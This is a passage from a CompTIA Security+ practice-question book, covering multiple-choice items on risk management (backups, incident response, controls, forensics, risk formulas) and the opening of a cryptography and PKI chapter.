- C. Provide every employee with their own device to access their personal email.
- D. Forward all personal emails to their company email account.
- 39. Which of the following is not a physical security control?
- A. Motion detector
- B. Fence
- C. Antivirus software
- D. CCTVChapter 5
- ■
- Risk Management
- 143
- 40. Which of the following might you find in a DRP?
- A. Single point of failure
- B. Prioritized list of critical computer systems
- C. Exposure factor
- D. Asset value
- 41. Your security manager wants to decide which risks to mitigate based on cost. What is this
- an example of?
- A. Quantitative risk assessment
- B. Qualitative risk assessment
- C. Business impact analysis
- D. Threat assessment
- 42. Your company has outsourced its proprietary processes to Acme Corporation. Due to
- technical issues, Acme Corporation wants to include a third-party vendor to help resolve
- the technical issues. Which of the following must Acme Corporation consider before
- sending data to the third party?
- A. This data should be encrypted before it is sent to the third-party vendor.
- B. This may constitute unauthorized data sharing.
- C. This may violate the privileged user role-based awareness training.
- D. This may violate a nondisclosure agreement.
- 43. Zack is a security administrator who has been given permission to run a vulnerability
- scan on the company’s wireless network infrastructure. The results show TCP ports
- 21 and 23 open on most hosts. What port numbers do these refer to? (Choose two.)
- A. FTP
- B. SMTP
- C. Telnet
- D. DNS
- 44. Which of the following backup concepts is the quickest backup but slowest restore?
- A. Incremental
- B. Differential
- C. Full
- D. Snapshots
- 45. Which of the following operations should you undertake to avoid mishandling of tapes,
- removal drives, CDs, and DVDs?
- A. Degaussing
- B. Acceptable use
- C. Data labeling
- D. WipingChapter 5
- 144
- ■
- Risk Management
- 46. Which of the following can be classified as a single point of failure?
- A. Failover
- B. A cluster
- C. Load balancing
- D. A configuration
- 47. Which of the following are considered detective controls?
- A. Closed-circuit television (CCTV)
- B. Guard
- C. Firewall
- D. IPS
- 48. Your CIO wants to move the company’s large sets of sensitive data to an SaaS cloud
- provider to limit the storage and infrastructure costs. Both the cloud provider and the
- company are required to have a clear understanding of the security controls that will
- be applied to protect the sensitive data. What type of agreement would the SaaS cloud
- provider and your company initiate?
- A. MOU
- B. BPA
- C. SLA
- D. ISA
- 49. Which of the following is typically included in a BPA?
- A. Clear statements detailing the expectation between a customer and a service provider
- B. The agreement that a specific function or service will be delivered at the agreed-upon
- level of performance
- C. Sharing of profits and losses and the addition or removal of a partner
- D. Security requirements associated with interconnecting IT systems
- 50. Your team powered off the SQL database server for over 7 hours to perform a test. Which
- of the following is the most likely reason for this?
- A. Business impact analysis
- B. Succession plan
- C. Continuity of operations plan
- D. Service level agreement
- 51. Which of the following role-based positions should receive training on how to manage a
- particular system?
- A. Users
- B.
- Privileged usersChapter 5
- C. Executive users
- D. System owners
- ■
- Risk Management
- 145
- 52. You maintain a network of 150 computers and must determine which hosts are secure and
- which are not. Which of the following tools would best meet your need?
- A. Vulnerability scanner
- B. Protocol analyzer
- C. Port scanner
- D. Password cracker
- 53. You have been instructed to introduce an affected system back into the company’s environ-
- ment and be sure that it will not lead to another incident. You test, monitor, and validate
- that the system is not being compromised by any other means. Which of the incident
- response processes have you completed?
- A. Lessons learned
- B. Preparation
- C. Recovery
- D. Containment
- 54. You discover that an investigator made a few mistakes during a recent forensic investiga-
- tion. You want to ensure the investigator follows the appropriate process for the collection,
- analysis, and preservation of evidence. Which of the following terms should you use for this
- process?
- A. Incident handling
- B. Legal hold
- C. Order of volatility
- D. Chain of custody
- 55. You receive a call from the help desk manager stating that there has been an increase
- in calls from users reporting their computers are infected with malware. Which of the
- following incident response steps should be completed first?
- A. Containment
- B. Eradication
- C. Lessons learned
- D. Identification
- 56. Which of the following are examples of custodian security roles? (Choose two.)
- A. Human resources employee
- B. Sales executive
- C. CEO
- D. Server backup operatorChapter 5
- 146
- ■
- Risk Management
- 57. You are the network administrator of your company, and the manager of a retail site
- located across town has complained about the loss of power to their building several
- times this year. The branch manager is asking for a compensating control to overcome the
- power outage. What compensating control would you recommend?
- A. Firewall
- B. Security guard
- C. IDS
- D. Backup generator
- 58. James is a security administrator and is attempting to block unauthorized access to the
- desktop computers within the company’s network. He has configured the computers’
- operating systems to lock after 5 minutes of no activity. What type of security control has
- James implemented?
- A. Preventive
- B. Corrective
- C. Deterrent
- D. Detective
- 59. Which of the following terms best describes sensitive medical information?
- A. AES
- B. PHI
- C. PII
- D. TLS
- 60. An accounting employee changes roles with another accounting employee every 4 months.
- What is this an example of?
- A. Separation of duties
- B. Mandatory vacation
- C. Job rotation
- D. Onboarding
- 61. Which of the following are considered inappropriate places to store backup tapes?
- (Choose two.)
- A. Near a workstation
- B. Near a speaker
- C. Near a CRT monitor
- D. Near an LCD screen
- 62. You are a member of your company’s security response team and have discovered an
- incident within your network. You are instructed to remove and restore the affected
- system. You restore the system with the original disk image and then install patches and
- disable any unnecessary services to harden the system against any future attacks. Which
- incident response process have you completed?
- A. Eradication
- B.
- PreparationChapter 5
- C. Containment
- D. Recovery
- ■
- Risk Management
- 147
- 63. You are a security administrator and have decided to implement a unified threat manage-
- ment (UTM) appliance within your network. This appliance will provide antimalware,
- spam filtering, and content inspection along with other protections. Which of the following
- statements best describes the potential problem with this plan?
- A. The protections can only be performed one at a time.
- B. This is a complex plan because you will manage several complex platforms.
- C. This could create the potential for a single point of failure.
- D. You work with a single vendor and its support department.
- 64. You are attending a risk analysis meeting and are asked to define internal threats. Which
- of the following is not considered an internal threat?
- A. Employees accessing external websites through the company’s hosts
- B. Embezzlement
- C. Threat actors compromising a network through a firewall
- D. Users connecting a personal USB thumb drive to a workstation
- 65. You are the network director and are creating the following year’s budget. You submit
- forensic dollar amounts for the cyber incident response team. Which of the following
- would you not submit? (Choose two.)
- A. ALE amounts
- B. SLE amounts
- C. Training expenses
- D. Man-hour expenses
- 66. Computer evidence of a crime is preserved by making an exact copy of the hard disk.
- Which of the following does this demonstrate?
- A. Chain of custody
- B. Order of volatility
- C. Capture system image
- D. Taking screenshots
- 67. Which option is an example of a workstation not hardened?
- A. Risk
- B. Threat
- C. Exposure
- D. MitigateChapter 5
- 148
- ■
- Risk Management
- 68. Which of the following elements should not be included in the preparation phase of the
- incident response process?
- A. Policy
- B. Lesson learned documentation
- C. Response plan/strategy
- D. Communication
- 69. Which of the following does not minimize security breaches committed by internal
- employees?
- A. Job rotation
- B. Separation of duties
- C. Nondisclosure agreements signed by employees
- D. Mandatory vacations
- 70. You find one of your employees posting negative comments about the company on Facebook
- and Twitter. You also discover the employee is sending negative comments from their
- personal email on the company’s computer. You are asked to implement a policy to help
- the company avoid any negative reputation in the marketplace. Which of the following
- would be the best option to fulfill the request?
- A. Account policy enforcement
- B. Change management
- C. Security policy
- D. Risk assessment
- 71. Which of the following statements best describes a differential backup?
- A. Only the changed portions of files are backed up.
- B. All files are copied to storage media.
- C. Files that have changed since the last full backup are backed up.
- D. Only files that have changed since the last full or incremental backup are backed up.
- 72. During which step of the incident response process does root cause analysis occur?
- A. Preparation
- B. Lessons learned
- C. Containment
- D. Recovery
- 73. Which of the following types of testing can help identify risks? (Choose two.)
- A. Quantitative
- B. Penetration testing
- C. Vulnerability testing
- D. QualitativeChapter 5
- ■
- Risk Management
- 149
- 74. What can a company do to prevent sensitive data from being retrieved by dumpster
- diving?
- A. Degaussing
- B. Capture system image
- C. Shredding
- D. Wiping
- 75. You are a network administrator and have been asked to send a large file that
- contains PII to an accounting firm. Which of the following protocols would it be best
- to use?
- A. Telnet
- B. FTP
- C. SFTP
- D. SMTP
- 76. Zackary is a network backup engineer and performs a full backup each Sunday evening
- and an incremental backup Monday through Friday evenings. One of the company’s
- network servers crashes on Thursday afternoon. How many backups will Zack need to do
- to restore the server?
- A. Two
- B. Three
- C. Four
- D. Five
- 77. Your company website is hosted by an Internet service provider. Which of the following
- risk response techniques is in use?
- A. Risk avoidance
- B. Risk register
- C. Risk acceptance
- D. Risk mitigation
- 78. A call center leases a new space across town, complete with a functioning computer
- network that mirrors the current live site. A high-speed network link continuously
- synchronizes data between the two sites. Which of the following describes the site at the
- new leased location?
- A. Cold site
- B. Warm site
- C. Hot site
- D. Differential siteChapter 5
- 150
- ■
- Risk Management
- 79. A security administrator is reviewing the company’s continuity plan, and it specifies an
- RTO of 4 hours and an RPO of 1 day. Which of the following is the plan describing?
- A. Systems should be restored within 1 day and should remain operational for at least
- 4 hours.
- B. Systems should be restored within 4 hours and no later than 1 day after the
- incident.
- C. Systems should be restored within 1 day and lose, at most, 4 hours’ worth of data.
- D. Systems should be restored within 4 hours with a loss of 1 day’s worth of data at
- most.
- 80. Which of the following statements is true regarding a data retention policy?
- A. Regulations require financial transactions to be stored for 7 years.
- B. Employees must remove and lock up all sensitive and confidential documents when
- not in use.
- C. It describes a formal process of managing configuration changes made to a
- network.
- D. It is a legal document that describes a mutual agreement between parties.
- 81. You are attending a meeting with your manager and he wants to validate the cost of a
- warm site versus a cold site. Which of the following reasons best justify the cost of a warm
- site? (Choose two.)
- A. Small amount of income loss during long downtime
- B. Large amount of income loss during short downtime
- C. Business contracts enduring no more than 72 hours of downtime
- D. Business contracts enduring no more than 8 hours of downtime
- 82. Recently, company data that was sent over the Internet was intercepted and read by
- hackers. This damaged the company’s reputation with its customers. You have been
- asked to implement a policy that will protect against these attacks. Which of the
- following options would you choose to help protect data that is sent over the Internet?
- (Choose two.)
- A. Confidentiality
- B. Safety
- C. Availability
- D. Integrity
- 83. How do you calculate the annual loss expectancy (ALE) that may occur due to a threat?
- A. Exposure Factor (EF) / Single Loss Expectancy (SLE)
- B. Single Loss Expectancy (SLE) × Annual Rate of Occurrence (ARO)
- C. Asset Value (AV) × Exposure Factor (EF)
- D. Single Loss Expectancy (SLE) / Exposure Factor (EF)Chapter 5
- ■
- Risk Management
- 151
- 84. Which of the following impact scenarios would include severe weather events? (Choose
- two.)
- A. Life
- B. Reputation
- C. Salary
- D. Property
- 85. Which of the following outlines a business goal for system restoration and allowable data
- loss?
- A. RPO
- B. Single point of failure
- C. MTTR
- D. MTBF
- 86. Which of the following is an example of a preventive control? (Choose two.)
- A. Data backups
- B. Security camera
- C. Door alarm
- D. Cable locks
- 87. You are a security administrator for your company and you identify a security risk that
- you do not have in-house skills to address. You decide to acquire contract resources. The
- contractor will be responsible for handling and managing this security risk. Which of
- the following type of risk response technique are you demonstrating?
- A. Accept
- B. Mitigate
- C. Transfer
- D. Avoid
- 88. You are an IT manager and discovered your department had a break-in, and the company’s
- computers were physically damaged. What type of impact best describes this situation?
- A. Life
- B. Reputation
- C. Property
- D. Safety
- 89. Which of the following would help build informed decisions regarding a specific DRP?
- A. Business impact analysis
- B. ROI analysis
- C. RTO
- D. Life impactChapter 5
- 152
- ■
- Risk Management
- 90. Each salesperson who travels has a cable lock to lock down their laptop when they step
- away from the device. Which of the following controls does this apply?
- A. Administrative
- B. Compensating
- C. Deterrent
- D. Preventive
- 91. Which of the following secures access to company data in agreement to management
- policies?
- A. Technical controls
- B. Administrative controls
- C. HTTPS
- D. Integrity
- 92. You are a server administrator for your company’s private cloud. To provide service to
- employees, you are instructed to use reliable hard disks in the server to host a virtual
- environment. Which of the following best describes the reliability of hard drives?
- A. MTTR
- B. RPO
- C. MTBF
- D. ALE
- 93. You are replacing a number of devices with a mobile appliance that combines several
- functions. Which of the following describes the new implementation?
- A. Cloud computing
- B. Load balancing
- C. Single point of failure
- D. Virtualization
- 94. Which of the following can help mitigate adware intrusions?
- A. Antivirus
- B. Antispam
- C. Spyware
- D. Pop-up blocker
- 95. In the initial stages of a forensics investigation, Zack, a security administrator, was given
- the hard drive of the compromised workstation by the incident manager. Which of the
- following data acquisition procedures would Zack need to perform in order to begin the
- analysis? (Choose two.)
- A. Take hashes
- B.
- Take screenshotsChapter 5
- C. Capture the system image
- D. Start the order of volatility
- ■
- Risk Management
- 153
- 96. Which of the following best describes a Computer Incident Response Team (CIRT)?
- A. Personnel who participate in exercises to practice incident response procedures
- B. Personnel who promptly and correctly handle incidents so they can be quickly
- contained, investigated, and recovered from
- C. A team to identify planning flaws before an actual incident occurs
- D. Team members using a walk-through checklist to ensure understanding of roles in a
- DRP
- 97. Which of the following decreases the success of brute-force attacks?
- A. Password complexity
- B. Password hints
- C. Account lockout threshold
- D. Enforce password history
- 98. A warrant has been issued to investigate a file server that is suspected to be part of an
- organized crime to steal credit card information. You are instructed to follow the order of
- volatility. Which data would you collect first?
- A. RAM
- B. USB flash drive
- C. Hard disk
- D. Swap files
- 99. What should human resources personnel be trained in regarding security policies?
- A. Guidelines and enforcement
- B. Order of volatility
- C. Penetration assessment
- D. Vulnerability assessment
- 100. Which of the following is not a basic concept of computer forensics?
- A. Preserve evidence
- B. Determine if the suspect is guilty based on the findings
- C. Track man-hours and expenses
- D. Interview all witnessesChapter 5
- 154
- ■
- Risk Management
- 101. The Chief Information Officer (CIO) wants to set up a redundant server location so
- that the production server images can be moved within 36 hours and the servers can be
- restored quickly, should a catastrophic failure occur at the primary location. Which of the
- following can be implemented?
- A. Hot site
- B. Cold site
- C. Warm site
- D. Load balancing
- 102. Choose the correct order of volatility when collecting digital evidence.
- A. Hard disk drive, DVD-R, RAM, swap file
- B. Swap file, RAM, DVD-R, hard disk drive
- C. RAM, DVD-R, swap file, hard disk drive
- D. RAM, swap file, hard disk drive, DVD-R
- 103. Which of the following pieces of information would be summarized in the lessons learned
- phase of the incident response process? (Choose three.)
- A. When the problem was first detected and by whom
- B. How the problem was contained and eradicated
- C. The work that was performed during the recovery
- D. Preparing a company’s team to be ready to handle an incident at a moment’s notice
- 104. You receive a phone call from an employee reporting that their workstation is acting
- strangely. You gather information from the intrusion detection system and notice unusual
- network traffic from the workstation, and you determine the event may be an incident.
- You report the event to your manager, who then begins to collect evidence and prepare for
- the next steps. Which phase of the incident response process is this?
- A. Preparation
- B. Identification
- C. Containment
- D. Eradication
- 105. Your manager has asked you to recommend a way to transmit PII via email and maintain
- its confidentiality. Which of the following options is the best solution?
- A. Hash the information before sending.
- B. Protect the information with a digital signature.
- C. Protect the information by using RAID.
- D. Encrypt the information before sending.
- 106. Which of the following statements best defines change management?
- A. Responding to, containing, analyzing, and recovering from a computer-related incident
- B. Means used to define which access permissions subjects have for a specific object
- C. Procedures followed when configuration changes are made to a network
- D. Categorizing threats and vulnerabilities and their potential impacts to a networkChapter 5
- ■
- Risk Management
- 155
- 107. During which step of the incident response process does identification of incidents that
- can be prevented or mitigated occur?
- A. Containment
- B. Eradication
- C. Preparation
- D. Lessons learned
- 108. Which of the following best describes the disadvantages of quantitative risk analysis
- compared to qualitative risk analysis? (Choose two.)
- A. Quantitative risk analysis requires complex calculations.
- B. Quantitative risk analysis is sometimes subjective.
- C. Quantitative risk analysis is generally scenario-based.
- D. Quantitative risk analysis is more time-consuming than qualitative risk analysis.
- 109. Which of the following are disadvantages of using a cold site? (Choose two.)
- A. Expense
- B. Recovery time
- C. Testing availability
- D. Administration time
- 110. Which of the following policies should be implemented to minimize data loss or theft?
- A. Password policy
- B. PII handling
- C. Chain of custody
- D. Detective control
- 111. Which of the following should a comprehensive data policy include?
- A. Wiping, disposing, storage, retention
- B. Disposing, patching, storage, retention
- C. Storage, retention, virtualization
- D. Onboarding, storage, disposing
- 112. You have revealed a recent intrusion within the company’s network and have decided to
- execute incident response procedures. The incident response team has identified audit
- logs that hold information about the recent security breach. Prior to the incident, a
- security consultant firm recommended that your company install a NTP server within
- the network. Which of the following is a setback the incident response team will likely
- encounter during the assessment?
- A. Order of volatility
- B. Chain of custody
- C. Eradication
- D. Record time offsetChapter 5
- 156
- ■
- Risk Management
- 113. You plan to provide a word processing program to the employees in your company. You
- decide not to install the program on each employee’s workstation but rather have a cloud
- service provider host the application. Which of the following risk response techniques best
- describes the situation?
- A. Risk mitigation
- B. Risk acceptance
- C. Risk avoidance
- D. Risk transfer
- 114. Which of the following statements is true about incremental backup?
- A. It backs up all files.
- B. It backs up all files in a compressed format.
- C. It backs up all new files and any files that have changed since the last full backup
- without resetting the archive bit.
- D. It backs up all new files and any files that have changed since the last full or
- incremental backup and resets the archive bit.
- 115. The chief security officer (CSO) has seen four security breaches during the past
- 2 years. Each breach cost the company $30,000, and a third-party vendor has offered
- to repair the security weakness in the system for $250,000. The breached system is set
- to be replaced in 5 years. Which of the following risk response techniques should the
- CSO use?
- A. Accept the risk.
- B. Transfer the risk.
- C. Avoid the risk.
- D. Mitigate the risk.
- 116. Which of the following would not be a guideline for performing a BIA?
- A. Identify impact scenarios that put your business operations at risk.
- B. Identify mission-essential functions and the critical systems within each function.
- C. Approve and execute changes in order to ensure maximum security and availability
- of IT services.
- D. Calculate RPO, RTO, MTTR, and MTBF.
- 117. You are a network administrator and have purchased two devices that will work as
- failovers for each other. Which of the following does this best demonstrate?
- A. Integrity
- B. Availability
- C. Authentication
- D. ConfidentialityChapter 5
- ■
- Risk Management
- 157
- 118. Your company has lost power and the salespeople cannot take orders because the computers
- and phone systems are unavailable. Which of the following would be the best options to an
- alternate business practice? (Choose two.)
- A. Tell the salespeople to go home for the day until the power is restored.
- B. Tell the salespeople to use their cell phones until the power is restored.
- C. Have the salespeople use paper and pen to take orders until the power is restored.
- D. Have the salespeople instruct customers to fax their orders until the power is
- restored.
- 119. Leigh Ann is the new network administrator for a local community bank. She studies the
- current file server folder structures and permissions. The previous administrator didn’t
- properly secure customer documents in the folders. Leigh Ann assigns appropriate file
- and folder permissions to be sure that only the authorized employees can access the data.
- What security role is Leigh Ann assuming?
- A. Power user
- B. Data owner
- C. User
- D. Custodian
- 120. Which of the following methods is not recommended for removing data from a storage
- media that is used to store confidential information?
- A. Formatting
- B. Shredding
- C. Wiping
- D. Degaussing
- 121. A SQL database server is scheduled for full backups on Sundays at 2:00 a.m. and incre-
- mental backups each weeknight at 11:00 p.m. Write verification is enabled, and backup
- tapes are stored off-site at a bank safety deposit box. Which of the following should be
- completed to ensure integrity and confidentiality of the backups? (Choose two.)
- A. Use SSL to encrypt the backup data.
- B. Encrypt the backup data before it is stored off-site.
- C. Ensure that an employee other than the backup operator analyzes each day’s backup
- logs.
- D. Ensure that the employee performing the backup is a member of the administrators’
- group.
- 122. You are planning to perform a security audit and would like to see what type of network
- traffic is transmitting within your company’s network. Which of the following tools
- would you use?
- A. Port scanner
- B. Vulnerability scanner
- C. Protocol analyzer
- D. Network intrusion detection systemChapter 5
- 158
- ■
- Risk Management
- 123. Your company has hired a new administrative assistant to a commercial lender named
- Leigh Ann. She will be using a web browser on a company computer at the office to access
- internal documents on a public cloud provider over the Internet. Which type of document
- should Leigh Ann read and sign?
- A. Internet acceptable use policy
- B. Audit policy
- C. Password policy
- D. Privacy policy
- 124. During a conversation with another colleague, you suggest there is a single point of failure
- in the single load balancer in place for the company’s SQL server. You suggest implement-
- ing two load balancers in place with only one in service at a given time. What type of load
- balancing configuration have you described?
- A. Active-active
- B. Active directory
- C. Round robin
- D. Active-passive
- 125. Which of the following policies would you implement to help prevent the company’s users
- from revealing their login credentials for others to view?
- A. Job rotation
- B. Data owner
- C. Clean desk
- D. Separation of duties
- 126. Which of the following are part of the chain of custody?
- A. Delegating evidence collection to your manager
- B. Capturing the system image to another hard drive
- C. Capturing memory contents before capturing hard disk contents
- D. Preserving, protecting, and documenting evidence
- 127. Zackary has been assigned the task of performing a penetration test on a server and was
- given limited information about the inner workings of the server. Which of the following
- tests will he be performing?
- A. White box
- B. Gray box
- C. Black box
- D. Clear box
- 128. Which of the following are considered administrative controls? (Choose two.)
- A. Firewall rules
- B.
- Personnel hiring policyChapter 5
- C. Separation of duties
- D. Intrusion prevention system
- ■
- Risk Management
- 159
- 129. Which of the following are examples of alternate business practices? (Choose two.)
- A. The business’s point-of-sale terminal goes down, and employees use pen and paper to
- take orders and a calculator to determine customers’ bills.
- B. The network system crashes due to an update, and employees are told to take time off
- until the company’s network system is restored.
- C. Power is lost at a company’s site and the manager posts a closed sign until power is
- restored.
- D. A bank location has lost power, and the employees are sent to another location to
- resume business.
- 130. Which of the following require careful handling and special policies for data retention and
- distribution? (Choose two.)
- A. Personal electronic devices
- B. MOU
- C. PII
- D. NDA
- 131. Matt is the head of IT security for a university department. He recently read articles about
- security breaches that involved malware on USB removable devices and is concerned about
- future incidents within the university. Matt reviews the past incident responses to deter-
- mine how these occurrences may be prevented and how to improve the past responses.
- What type of document should Matt prepare?
- A. MOU
- B. SLA
- C. After-action report
- D. Nondisclosure agreement
- 132. Categorizing residual risk is most important to which of the following risk response
- techniques?
- A. Risk mitigation
- B. Risk acceptance
- C. Risk avoidance
- D. Risk transfer
- 133. You are the IT manager and one of your employees asks who assigns data labels. Which of
- the following assigns data labels?
- A. Owner
- B. Custodian
- C. Privacy officer
- D. System administratorChapter 5
- 160
- ■
- Risk Management
- 134. Which of the following is the most pressing security concern related to social media
- networks?
- A. Other users can view your MAC address.
- B. Other users can view your IP address.
- C. Employees can leak a company’s confidential information.
- D. Employees can express their opinion about their company.
- 135. You are a network administrator looking to test patches quickly and often before pushing
- them out to the production workstations. Which of the following would be the best way
- to do this?
- A. Create a full disk image to restore the system after each patch installation.
- B. Create a virtual machine and utilize snapshots.
- C. Create an incremental backup of an unpatched workstation.
- D. Create a differential backup of an unpatched workstation.
- 136. You have instructed your junior network administrator to test the integrity of the com-
- pany’s backed-up data. Which of the following is the best way to test the integrity of a
- backup?
- A. Review written procedures.
- B. Use software to recover deleted files.
- C. Restore part of the backup.
- D. Conduct another backup.
- 137. What concept is being used when user accounts are created by one employee and user
- permissions are configured by another employee?
- A. Background checks
- B. Job rotation
- C. Separation of duties
- D. Collusion
- 138. Your company is requesting the installation of a fence around the property and cipher locks
- on all front entrances. Which of the following concepts is your company concerned about?
- A. Confidentiality
- B. Integrity
- C. Availability
- D. Safety
- 139. Which of the following is an example of a vulnerability assessment tool?
- A. Ophcrack
- B. John the Ripper
- C. L0phtCrack
- D. NessusChapter 5
- ■
- Risk Management
- 161
- 140. A security analyst is analyzing the cost the company could incur if the customer database
- was breached. The database contains 2,500 records with PII. Studies show the cost per
- record would be $300. The likelihood that the database would be breached in the next
- year is only 5%. Which of the following would be the ALE for a security breach?
- A. $15,000
- B. $37,500
- C. $150,000
- D. $750,000
- 141. Your team must perform a test of a specific system to be sure the system operates at the
- alternate site. The results of the test must be compared with the company’s live environ-
- ment. Which test is your team performing?
- A. Cutover test
- B. Walk-through
- C. Parallel test
- D. Simulation
- 142. Which of the following concepts defines a company goal for system restoration and
- acceptable data loss?
- A. MTBF
- B. MTTR
- C. RPO
- D. ARO
- 143. Your IT team has created a disaster recovery plan to be used in case a SQL database
- server fails. What type of control is this?
- A. Detective
- B. Corrective
- C. Preventive
- D. Deterrent
- 144. Which of the following is not a step in the incident response process?
- A. Snapshot
- B. Preparation
- C. Recovery
- D. Containment
- 145. Which of the following threats is mitigated by shredding paper documents?
- A. Shoulder surfing
- B. Physical
- C. Adware
- D. SpywareChapter 5
- 162
- ■
- Risk Management
- 146. Your company hires a third-party auditor to analyze the company’s data backup and
- long-term archiving policy. Which type of organization document should you provide
- to the auditor?
- A. Clean desk policy
- B. Acceptable use policy
- C. Security policy
- D. Data retention policy
- 147. You are a network administrator and have been given the duty of creating users accounts
- for new employees the company has hired. These employees are added to the identity
- and access management system and assigned mobile devices. What process are you
- performing?
- A. Offboarding
- B. System owner
- C. Onboarding
- D. Executive user
- 148. Which of the following defines a standard operating procedure (SOP)? (Choose three.)
- A. Standard
- B. Privacy
- C. Procedure
- D. Guideline
- 149. Computer equipment was suspected to be involved in a computer crime and was seized.
- The computer equipment was left unattended in a corridor for 10 minutes while officers
- restrained a potential suspect. The seized equipment is no longer admissible as evidence
- because of which of the following violations?
- A. Chain of custody
- B. Order of volatility
- C. Preparation
- D. Eradication
- 150. Which of the following should be performed when conducting a qualitative risk analysis?
- (Choose two.)
- A. ARO
- B. SLE
- C. Asset estimation
- D. Rating potential threatsChapter
- 6
- Cryptography and PKI
- The CompTIA Security+ Exam
- SY0-501 topics covered in this
- chapter include the following:
- ✓ ✓ 6.1 Compare and contrast basic concepts of
- cryptography.
- ■ ■ Symmetric algorithms
- ■ ■ Modes of operation
- ■ ■ Asymmetric algorithms
- ■ ■ Hashing
- ■ ■ Salt, IV, nonce
- ■ ■ Elliptic curve
- ■ ■ Weak/deprecated algorithms
- ■ ■ Key exchange
- ■ ■ Digital signatures
- ■ ■ Diffusion
- ■ ■ Confusion
- ■ ■ Collision
- ■ ■ Steganography
- ■ ■ Obfuscation
- ■ ■ Stream vs. block
- ■ ■ Key strength
- ■ ■ Session keys
- ■ ■ Ephemeral key
- ■ ■ Secret algorithm
- ■ ■ Data-in-transit
- ■ ■ Data-at-rest
- ■ ■ Data-in-use■ ■ Random/pseudo-random number generation
- ■ ■ Key stretching
- ■ ■ Implementation vs. algorithm selection
- ■ ■ Crypto service provider
- ■ ■ Crypto modules
- ■ ■ Perfect forward secrecy
- ■ ■ Security through obscurity
- ■ ■ Common use cases
- ■ ■ Low power devices
- ■ ■ Low latency
- ■ ■ High resiliency
- ■ ■ Supporting confidentiality
- ■ ■ Supporting integrity
- ■ ■ Supporting obfuscation
- ■ ■ Supporting authentication
- ■ ■ Supporting non-repudiation
- ■ ■ Resource vs. security constraints
- ✓ ✓ 6.2 Explain cryptography algorithms and their basic
- characteristics.
- ■ ■
- ■ ■
- Symmetric algorithms
- ■ ■ AES
- ■ ■ DES
- ■ ■ 3DES
- ■ ■ RC4
- ■ ■ Blowfish/Twofish
- Cipher modes
- ■ ■ CBC
- ■ ■ GCM
- ■ ■ ECB
- ■ ■ CTM
- ■ ■ Stream vs. block■ ■
- ■ ■
- ■ ■
- ■ ■
- Asymmetric algorithms
- ■ ■ RSA
- ■ ■ DSA
- ■ ■ Diffie-Hellman
- ■ ■ Groups
- ■ ■ DHE
- ■ ■ ECDHE
- ■ ■ Elliptic curve
- ■ ■ PGP/GPG
- Hashing algorithms
- ■ ■ MD5
- ■ ■ SHA
- ■ ■ HMAC
- ■ ■ RIPEMD
- Key stretching algorithms
- ■ ■ BCRYPT
- ■ ■ PBKDF2
- Obfuscation
- ■ ■ XOR
- ■ ■ ROT13
- ■ ■ Substitution ciphers
- ✓ ✓ 6.3 Given a scenario, install and configure wireless
- security settings.
- ■ ■
- ■ ■
- Cryptographic protocols
- ■ ■ WPA
- ■ ■ WPA2
- ■ ■ CCMP
- ■ ■ TKIP
- Authentication protocols
- ■ ■ EAP
- ■ ■ PEAP
- ■ ■ EAP-FAST■ ■
- ■ ■ EAP-TLS
- ■ ■ EAP-TTLS
- ■ ■ IEEE 802.1x
- ■ ■ RADIUS Federation
- Methods
- ■ ■ PSK vs. Enterprise vs. Open
- ■ ■ WPS
- ■ ■ Captive portals
- ✓ ✓ 6.4 Given a scenario, implement public key infrastructure.
- ■ ■
- ■ ■
- ■ ■
- Components
- ■ ■ CA
- ■ ■ Intermediate CA
- ■ ■ CRL
- ■ ■ OCSP
- ■ ■ CSR
- ■ ■ Certificate
- ■ ■ Public key
- ■ ■ Private key
- ■ ■ Object identifiers (OID)
- Concepts
- ■ ■ Online vs. offline CA
- ■ ■ Stapling
- ■ ■ Pinning
- ■ ■ Trust model
- ■ ■ Key escrow
- ■ ■ Certificate chaining
- Types of certificates
- ■ ■ Wildcard
- ■ ■ SAN
- ■ ■ Code signing■ ■
- ■ ■ Self-signed
- ■ ■ Machine/computer
- ■ ■ Email
- ■ ■ User
- ■ ■ Root
- ■ ■ Domain validation
- ■ ■ Extended validation
- Certificate formats
- ■ ■ DER
- ■ ■ PEM
- ■ ■ PFX
- ■ ■ CER
- ■ ■ P12
- ■ ■ P7BChapter 6
- 168
- ■
- Cryptography and PKI
- 1. Which of the following would a public key be used for?
- A. To decrypt a hash of a digital signature
- B. To encrypt TLS traffic
- C. To digitally sign messages
- D. To decrypt TLS messages
- 2. Your company’s web server certificate has been revoked and external customers are
- receiving errors when they connect to the website. Which of following actions must
- you take?
- A. Renew the certificate.
- B. Create and use a self-signed certificate.
- C. Request a certificate from the key escrow.
- D. Generate a new key pair and new certificate.
- 3. Mary is concerned about the validity of an email because a coworker denies sending it.
- How can Mary prove the authenticity of the email?
- A. Symmetric algorithm
- B. Digital signature
- C. CRL
- D. Asymmetric algorithm
- 4. Wi-Fi Alliance recommends that a passphrase be how many characters in length for
- WPA2-Personal security?
- A. 6 characters
- B. 8 characters
- C. 12 characters
- D. 16 characters
- 5. Which of the following digital certificate management practices will ensure that a lost
- certificate is not compromised?
- A. CRL
- B. Key escrow
- C. Nonrepudiation
- D. Recovery agent
- 6. Which of the following are restricted to 64-bit block sizes? (Choose two.)
- A. DES
- B. SHA
- C. MD5
- D. 3DESChapter 6
- ■
- Cryptography and PKI
- 169
- 7. Your company has implemented a RADIUS server and has clients that are capable of using
- multiple EAP types, including one configured for use on the RADIUS server. Your secu-
- rity manager wants to implement a WPA2-Enterprise system. Since you have the RADIUS
- server and clients, what piece of the network would you need?
- A. Network access control
- B. Authentication server
- C. Authenticator
- D. Supplicant
- 8. You are given the task of selecting an asymmetric encryption type that has an appropriate
- level of encryption strength but uses a smaller key length than is typically required. Which
- of the following encryption methods will accomplish your requirement?
- A. Blowfish
- B. RSA
- C. DHE
- D. ECC
- 9. Matt has been told that successful attacks have been taking place and data that has been
- encrypted by his company’s software system has leaked to the company’s competitors.
- Matt, through investigation, has discovered patterns due to the lack of randomness in
- the seeding values used by the encryption algorithm in the company’s software. This
- discovery has led to successful reverse engineering. What can the company use to ensure
- patterns are not created during the encryption process?
- A. One-time pad
- B. Initialization vector
- C. Stream cipher
- D. Block cipher
- 10. You are asked to configure a WLAN that does not require a user to provide any creden-
- tials to associate with a wireless AP and access a WLAN. What type of authentication is
- said to be in use?
- A. IV
- B. WEP
- C. WPA
- D. Open
- 11. The CIO at your company no longer wants to use asymmetric algorithms because of the
- cost. Of the following algorithms, which should the CIO discontinue using?
- A. AES
- B. RC4
- C. RSA
- D. TwofishChapter 6
- 170
- ■
- Cryptography and PKI
- 12. Which of the following would you use to verify certificate status by receiving a response
